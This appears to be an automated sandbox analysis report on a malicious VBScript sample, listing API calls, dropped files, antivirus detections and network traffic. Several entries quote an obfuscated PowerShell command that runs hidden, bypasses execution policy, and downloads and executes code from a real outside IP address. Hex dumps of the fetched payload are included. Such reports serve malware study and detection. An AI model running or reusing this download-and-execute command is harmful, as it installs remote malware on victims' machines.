NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05008000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05009000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05011000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\Public\micros.vbs
file	C:\Users\Public\micros.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/=//=//=//=//=//=//=//=//=//=/(''http://51.254.49.49:222/truintobroth/cod.jpg'')'.RePLACe('/=//=//=//=//=//=//=//=//=//=/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/=//=//=//=//=//=//=//=//=//=/(''http://51.254.49.49:222/truintobroth/cod.jpg'')'.RePLACe('/=//=//=//=//=//=//=//=//=//=/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 4, 2023, 5:04 p.m.	show_type: 0 filepath_r: POWeRSHeLL.eXe parameters: -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/=//=//=//=//=//=//=//=//=//=/(''http://51.254.49.49:222/truintobroth/cod.jpg'')'.RePLACe('/=//=//=//=//=//=//=//=//=//=/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) filepath: POWeRSHeLL.eXe	1	1	0

File has been identified by 6 AntiVirus engines on VirusTotal as malicious (6 events)

Symantec	ISB.Downloader!gen80
ESET-NOD32	PowerShell/Runner.A suspicious
Kaspersky	HEUR:Trojan.Script.Generic
Tencent	Script.Trojan.Generic.Hdhl
Ikarus	Trojan.PowerShell.Agent
ZoneAlarm	HEUR:Trojan.Script.Generic

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 4, 2023, 5:04 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received

/=00/=00/=28/=06/=00/=00/=06/=06/=07/=6F/=2C/=00/=00/=0A/=38/=98/=00/=00/=00/=73/=2D/=00/=00/=0A/=13/=05/=72/=EF/=02/=00/=70/=72/=EF/=02/=00/=70/=73/=2E/=00/=00/=0A/=13/=06/=11/=05/=11/=06/=6F/=2F/=00/=00/=0A/=11/=05/=7E/=0E/=00/=00/=04/=6F/=30/=00/=00/=0A/=17/=8D/=38/=00/=00/=01/=25/=16/=72/=0E/=21/=00/=70/=A2/=16/=6F/=31/=00/=00/=0A/=13/=07/=11/=07/=16/=A3/=38/=00/=00/=01/=80/=02/=00/=00/=04/=11/=07/=73/=27/=00/=00/=0A/=17/=11/=07/=8E/=69/=6F/=32/=00/=00/=0A/=A3/=38/=00/=00/=01/=80/=01/=00/=00/=04/=28/=06/=00/=00/=06/=7E/=02/=00/=00/=04/=7E/=01/=00/=00/=04/=28/=15/=00/=00/=0A/=6F/=2C/=00/=00/=0A/=DD/=0F/=00/=00/=00/=11/=05/=39/=07/=00/=00/=00/=11/=05/=6F/=33/=00/=00/=0A/=DC/=28/=06/=00/=00/=06/=6F/=2B/=00/=00/=0A/=39/=18/=01/=00/=00/=17/=28/=13/=00/=00/=06/=28/=06/=00/=00/=06/=17/=73/=34/=00/=00/=0A/=16/=14/=FE/=06/=1D/=00/=00/=06/=73/=35/=00/=00/=0A/=73/=36/=00/=00/=0A/=28/=09/=00/=00/=06/=28/=08/=00/=00/=06/=28/=06/=00/=00/=06/=6F/=37/=00/=00/=0A/=6F/=38/=00/=00/=0A/=17/=8D/=39/=00/=00/=01/=25/=16/=1F/=3A/=9D/=6F/=26/=00/=00/=0A/=16/=A3/=38/=00/=00/=01/=14/=20/=C0/=00/=00/=00/=16/=6F/=39/=00/=00/=0A/=1A/=6A/=28/=0D/=00/=00/=06/=28/=0C/=00/=00/=06/=D4/=8D/=44/=00/=00/=01/=28/=0B/=00/=00/=06/=16/=6A/=28/=0F/=00/=00/=06/=28/=2F/=00/=00/=06/=28/=20/=00/=00/=06/=16/=28/=18/=00/=00/=06/=16/=28/=1A/=00/=00/=06/=14/=FE/=06/=21/=00/=00/=06/=73/=3A/=00/=00/=0A/=14/=73/=27/=00/=00/=0A/=20/=10/=27/=00/=00/=20/=98/=3A/=00/=00/=6F/=32/=00/=00/=0A/=73/=27/=00/=00/=0A/=20/=10/=27/=00/=00/=20/=98/=3A/=00/=00/=6F/=32/=00/=00/=0A/=73/=3B/=00/=00/=0A/=28/=11/=00/=00/=06/=14/=FE/=06/=22/=00/=00/=06/=73/=3A/=00/=00/=0A/=14/=17/=17/=73/=3B/=00/=00/=0A/=28/=16/=00/=00/=06/=28/=08/=00/=00/=06/=28/=0A/=00/=00/=06/=28/=0E/=00/=00/=06/=69/=28/=0C/=00/=00/=06/=69/=14/=FE/=06/=1F/=00/=00/=06/=73/=3C/=00/=00/=0A/=14/=6F/=3D/=00/=00/=0A/=26/=38/=06/=00/=00/=00/=16/=28/=13/=00/=00/=06/=DD/=0C/=00/=00/=00/=26/=16/=28/=13/=00/=00/=06/=DD/=00/=00/=00/=00/=2A/=00/=00/=00/=41/=4C/=00/=00/=00/=00/=00/=00/=CE/=00/=00/=00/=26/=00/=00/=00/=F4/=00/=00/=00/=06/=00/=00/=00/=01/=00/=00/=01/=02/=00/=00/=00/=21/=01/=00/=00/=82/=00/=00/=00/=A3/=01/=00/=00/=0F/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=E4/=02/=00/=00/=E4/=02/=00/=00/=0C/=00/=00/=00/=01/=00/=00/=01/=1B/=30/=02/=00/=6A/=00/=00/=00/=00/=00/=00/=00/=28/=08/=00/=00/=06/=25/=3A/=06/=00/=00/=00/=26/=38/=05/=00/=00/=00/=28/=40/=00/=00/=0A/=28/=06/=00/=00/=06/=25/=3A/=06/=00/=00/=00/=26/=38/=05/=00/=00/=00/=28/=41/=00/=00/=0A/=28/=15/=00/=00/=06/=25/=3A/=06/=00/=00/=00/=26/=38/=05/=00/=00/=00/=28/=42/=00/=00/=0A/=28/=10/=00/=00/=06/=25/=3A/=06/=00/=00/=00/=26/=38/=05/=00/=00/=00/=28/=42/=00/=00/=0A/=DD/=06/=00/=00/=00/=26/=DD/=00/=00/=00/=00/=16/=28/=13/=00/=00/=06/=2A/=00/=00/=01/=10/=00/=00/=00/=00/=00/=00/=5D/=5D/=00/=06/=01/=00/=00/=01/=1B/=30/=06/=00/=BA/=01/=00/=00/=04/=00/=00/=11/=28/=06/=00/=00/=06/=6F/=2B/=00/=00/=0A/=39/=0A/=00/=00/=00/=28/=12/=00/=00/=06/=3A/=0B/=00/=00/=00/=16/=28/=13/=00/=00/=06/=DD/=95/=01/=00/=00/=28/=08/=00/=00/=06/=02/=6F/=43/=00/=00/=0A/=0A/=06/=16/=3E/=6B/=01/=00/=00/=28/=0E/=00/=00/=06/=06/=6A/=58/=28/=0F/=00/=00/=06/=28/=0C/=00/=00/=06/=06/=6A/=59/=28/=0D/=00/=00/=06/=28/=0C/=00/=00/=06/=3A/=02/=01/=00/=00/=28/=0A/=00/=00/=06/=16/=28/=44/=00/=00/=0A/=6A/=28/=0D/=00/=00/=06/=28/=0C/=00/=00/=06/=16/=6A/=3E/=C2/=00/=00/=00/=16/=6A/=28/=0F/=00/=00/=06/=28/=0C/=00/=00/=06/=D4/=8D/=44/=00/=00/=01/=28/=0B/=00/=00/=06/=38/=5F/=00/=00/=00/=28/=08/=00

Data received

/=98/=04/=06/=12/=83/=9C/=07/=20/=02/=12/=81/=A1/=1C/=0E/=0A/=00/=03/=12/=81/=A1/=1C/=0E/=12/=83/=9C/=04/=06/=12/=83/=A0/=07/=20/=02/=12/=81/=A1/=1C/=1C/=0A/=00/=03/=12/=81/=A1/=1C/=1C/=12/=83/=A0/=04/=06/=12/=83/=A4/=08/=20/=03/=12/=81/=A1/=1C/=0E/=1C/=0B/=00/=04/=12/=81/=A1/=1C/=0E/=1C/=12/=83/=A4/=04/=06/=12/=83/=A8/=06/=20/=01/=12/=81/=A1/=1C/=09/=00/=02/=12/=81/=A1/=1C/=12/=83/=A8/=06/=00/=01/=01/=12/=80/=91/=06/=20/=01/=01/=11/=81/=B1/=09/=20/=02/=12/=81/=55/=1D/=05/=1D/=05/=05/=20/=00/=12/=80/=BD/=09/=00/=02/=02/=12/=80/=BD/=12/=80/=BD/=05/=00/=00/=12/=80/=C9/=09/=00/=02/=12/=80/=91/=12/=80/=85/=08/=05/=00/=02/=09/=09/=09/=09/=20/=02/=1D/=0E/=1D/=0E/=11/=81/=A9/=08/=B0/=3F/=5F/=7F/=11/=D5/=0A/=3A/=06/=20/=01/=12/=80/=BD/=0E/=05/=00/=02/=02/=0E/=0E/=06/=20/=00/=1D/=12/=80/=BD/=04/=00/=01/=09/=08/=04/=00/=01/=08/=09/=06/=00/=01/=12/=81/=AD/=08/=06/=20/=01/=12/=80/=85/=08/=06/=20/=00/=1D/=12/=80/=C5/=06/=20/=01/=12/=80/=B9/=08/=09/=00/=02/=02/=12/=80/=85/=12/=80/=85/=03/=20/=00/=05/=03/=20/=00/=0C/=03/=20/=00/=0D/=05/=20/=01/=0E/=1D/=05/=08/=00/=01/=12/=80/=85/=12/=80/=85/=07/=00/=02/=1C/=12/=80/=85/=08/=07/=00/=02/=1C/=12/=80/=85/=09/=07/=00/=02/=1C/=12/=80/=85/=06/=07/=00/=02/=1C/=12/=80/=85/=07/=07/=00/=02/=1C/=12/=80/=85/=05/=07/=00/=02/=1C/=12/=80/=85/=04/=07/=00/=02/=1C/=12/=80/=85/=0A/=07/=00/=02/=1C/=12/=80/=85/=0B/=03/=20/=00/=0B/=05/=20/=02/=01/=1C/=08/=04/=20/=01/=1C/=08/=09/=00/=02/=02/=12/=80/=C5/=12/=80/=C5/=09/=00/=02/=02/=12/=80/=B9/=12/=80/=B9/=04/=00/=01/=01/=18/=04/=20/=00/=12/=65/=09/=20/=01/=1D/=12/=80/=BD/=11/=81/=15/=05/=20/=00/=11/=81/=89/=06/=20/=01/=12/=80/=C5/=08/=06/=20/=01/=12/=81/=19/=08/=06/=00/=01/=1C/=12/=80/=85/=04/=00/=01/=18/=08/=04/=20/=01/=0E/=08/=04/=00/=01/=02/=0D/=06/=20/=01/=02/=12/=80/=85/=09/=20/=02/=01/=11/=81/=21/=12/=80/=85/=08/=20/=01/=12/=81/=99/=12/=80/=85/=09/=20/=02/=01/=11/=81/=21/=12/=81/=99/=0D/=20/=03/=01/=11/=81/=21/=12/=80/=BD/=1D/=12/=80/=85/=09/=20/=02/=01

Poweshell is sending data to a remote host (1 event)

Data sent

GET /truintobroth/cod.jpg HTTP/1.1 Host: 51.254.49.49:222 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 4, 2023, 5:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

51.254.49.49

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Sept. 4, 2023, 5:04 p.m.	buffer: GET /truintobroth/cod.jpg HTTP/1.1 Host: 51.254.49.49:222 Connection: Keep-Alive socket: 1396 sent: 86	1	86	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/=//=//=//=//=//=//=//=//=//=/(''http://51.254.49.49:222/truintobroth/cod.jpg'')'.RePLACe('/=//=//=//=//=//=//=//=//=//=/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process	wscript.exe				martian_process	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/=//=//=//=//=//=//=//=//=//=/(''http://51.254.49.49:222/truintobroth/cod.jpg'')'.RePLACe('/=//=//=//=//=//=//=//=//=//=/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

Creates a suspicious Powershell process (8 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

gen.txt.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All